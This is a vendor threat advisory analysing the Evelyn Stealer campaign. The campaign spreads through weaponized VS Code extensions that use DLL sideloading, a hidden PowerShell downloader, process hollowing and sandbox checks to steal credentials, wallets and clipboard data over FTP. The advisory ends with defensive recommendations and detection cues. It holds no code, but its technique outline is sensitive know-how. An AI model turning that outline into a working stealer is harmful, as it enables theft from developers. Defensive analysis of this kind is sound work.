Comprehensive Threat Exposure Management Platform
Hive Pro recognized in Gartner® Magic Quadrant™ for Exposure Assessment Platform, 2025 Watch platform in action
The Evelyn Stealer campaign represents a sophisticated, multi-stage information-stealing operation targeting software developers worldwide through weaponized Visual Studio Code extensions. First detected on December 8, 2025, this attack leverages the trusted VS Code extension ecosystem to deliver malicious payloads disguised as legitimate development tools. The Evelyn Stealer malware employs advanced techniques including DLL sideloading, PowerShell execution, and process hollowing to establish persistence and evade detection on Windows systems.
The malware campaign specifically targets developers in the software development and technology industries, capitalizing on implicit trust in development environments. Once embedded, Evelyn Stealer systematically harvests sensitive data including browser credentials, cryptocurrency wallet information, Wi-Fi passwords, clipboard contents, and comprehensive system metadata. The stolen information is packaged into ZIP archives and exfiltrated to attacker-controlled FTP infrastructure, demonstrating a mature and deliberate approach to targeting developer ecosystems.
The Evelyn Stealer attack begins with threat actors distributing weaponized Visual Studio Code extensions that masquerade as legitimate development tools. These malicious extensions abuse the trusted VS Code extension ecosystem, blending seamlessly into developer workflows. The initial payload presents itself as a legitimate Lightshot DLL component, executed alongside the genuine Lightshot.exe executable to maintain credibility and avoid suspicion.
The malicious DLL imitates expected Lightshot behavior while executing hidden payload operations in parallel. To prevent duplicate execution and maintain stealth, the Evelyn malware enforces a singleton model using internal checks and mutex mechanisms. This stage spawns a concealed PowerShell process to download the second-stage payload, saved as “runtime.exe” in the local temporary directory, ensuring seamless transition without alerting the targeted developer.
The second-stage Evelyn Stealer payload functions as a process hollowing injector responsible for deploying the final malware component. This stage decrypts the third-stage payload using AES-256-CBC encryption with predefined keys and initialization vectors. The decrypted payload is then injected into the legitimate Windows process “grpconv.exe” through advanced process hollowing techniques.
Once execution resumes, Evelyn Stealer dynamically resolves Windows APIs required for process injection, file system interaction, registry access, clipboard monitoring, and network communication. These actions are deliberately obfuscated, reflecting strong focus on evasion and resilience against both manual analysis and automated security defenses deployed in enterprise environments.
Before initiating large-scale data theft operations, the Evelyn malware conducts extensive environmental checks to confirm it is not operating in virtualized or sandboxed environments. These anti-analysis checks include GPU profiling, hostname validation, disk size inspection, process enumeration, and registry key analysis. Only after determining the environment is trustworthy does Evelyn Stealer create dedicated directory structures within the user’s AppData folder to stage its operations.
The malware prepares for credential harvesting by terminating active browser processes and locating its decryption component, “abe_decrypt.dll,” either locally or by retrieving it from attacker-controlled FTP servers if necessary. This systematic approach demonstrates the campaign’s focus on maintaining operational security throughout the attack lifecycle.
With all components in place, Evelyn Stealer proceeds to harvest browser credentials through DLL injection techniques, capture desktop screenshots, and collect extensive sensitive data. The malware targets system information, clipboard contents, Wi-Fi credentials, and cryptocurrency wallet details, consolidating all stolen data into compressed ZIP archives.
The exfiltration phase transmits stolen information to attacker command-and-control infrastructure over FTP using structured filenames for tracking and organization. This developer-targeted attack illustrates a mature and deliberate approach to supply chain compromise, transforming trusted development tools into effective delivery mechanisms for information theft operations.
Review all installed Visual Studio Code extensions within your development environment and remove any unrecognized or untrusted extensions, particularly those published by unverified developers or with low download counts and no reviews.
Establish an approved list of VS Code extensions for your organization and configure policies to prevent installation of extensions outside the whitelist, reducing the risk of trojanized extension installation.
Implement detection rules for the specific file hashes and behavioral indicators associated with this campaign, including monitoring for process injection, suspicious PowerShell execution from VS Code contexts, and FTP traffic to unknown destinations.
Enable comprehensive PowerShell logging, including script block logging and module logging, to detect hidden PowerShell commands used by the malware downloader component.
Monitor and alert on browser processes launched with suspicious command-line arguments such as headless mode, disabled sandbox, or off-screen window positioning that indicate potential credential theft activity.
Apply zero-trust architecture principles specifically to developer workstations and development workflows, treating these as high-value assets with access to production systems and intellectual property.
Separate cryptocurrency wallet access and operations from development systems to prevent credential theft from compromising digital assets.
https://www.trendmicro.com/en_us/research/26/a/analysis-of-the-evelyn-stealercampaign.html
Get through updates and upcoming events, and more directly in your inbox